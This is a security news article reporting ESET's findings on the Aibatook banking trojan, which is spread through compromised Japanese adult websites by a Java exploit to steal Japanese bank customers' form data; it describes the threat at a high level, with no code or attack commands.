Compromised Japanese porn websites distribute banking trojan

Share this article:
Pwnium 4 prizes aimed at Chrome OS hacks
Aibatook only targets Japanese companies, but the malware can easily be repurposed for use in the U.S.

Attackers have compromised popular Japanese adult websites in order to distribute a trojan that is primarily targeting customers of two major banks in the country; however, the malware could easily be repurposed for use in the U.S., according to researchers with ESET.

The Aibatook trojan is capable of constantly monitoring browsing activity, modifying visited web pages, redirecting to web pages, and constantly monitoring and exfiltrating information entered into web forms, Joan Calvet, a malware researcher with ESET, told SCMagazine.com in a Wednesday email correspondence.

Aibatook was first identified in late 2013, but the operators updated the malware in April for use specifically against two major Japanese banks, and more broadly against other Japanese companies, in a campaign only targeting users of Internet Explorer, according to a Wednesday post.

“Internet Explorer is the most used browser in Japan,” Calvet said, adding the attackers likely have no need to extend their browser coverage. Furthermore, in order to steal information from victims, an Internet Explorer manipulation technique is used, the post explains.

Aibatook is programmed to specifically target visitors to the Japan Post and SBI Sumishin Net Bank websites – it uses more general form grabbing techniques to steal data when visiting other Japanese company websites – but that may not always be the case, Calvet said.

“It could easily be retargeted against U.S. banks by using the configurable information stealer implemented in Aibatook, allowing its authors to add any webpage's input fields to make it a target,” Calvet said.

Although others are believed to exist, ESET researchers identified four Japanese adult websites – sokuhabo.net, uravidata.com, ppv.xxxurabi.com, and mywife.cc – that could redirect users to a page that exploits Java vulnerability CVE-2013-2465 to distribute the malware, the post indicates.

Why only use a single exploit to infect users?

“The exploitation success ratio is probably high enough for the Aibatook's operators,” Calvet said, adding this appears to be the early stages of the operation. “Using a more powerful exploit pack and targeting other web browsers would be the next logical step for the operators in order to increase the number of potential victims.”

ESET researchers in the post stated that it is unclear exactly how the Japanese adult websites are being compromised in the first place, but Calvet suggested that the attackers – who ESET believes to be from Japan – might have used Aibatook to steal webmaster passwords.

Share this article:

Sign up to our newsletters

More in News

Firefox 32 feature could cut undetected malware downloads 'in half'

Mozilla plans to introduce a feature in Firefox 32 that, based on preliminary testing, could cut the amount of undetected malware downloads in half.

EFF asks court to find NSA internet spying a violation of Fourth Amendment

EFF asks court to find NSA internet spying ...

Complete with a colorful graphic, the EFF showed a federal court how the NSA essentially runs a digital dragnet that can pick up innocent Americans.

Study: Asian Android users at higher risk of malware exposure

Cheetah Mobile's new study showed that Asian Android users have a two to three times greater risk of downloading malware onto their devices.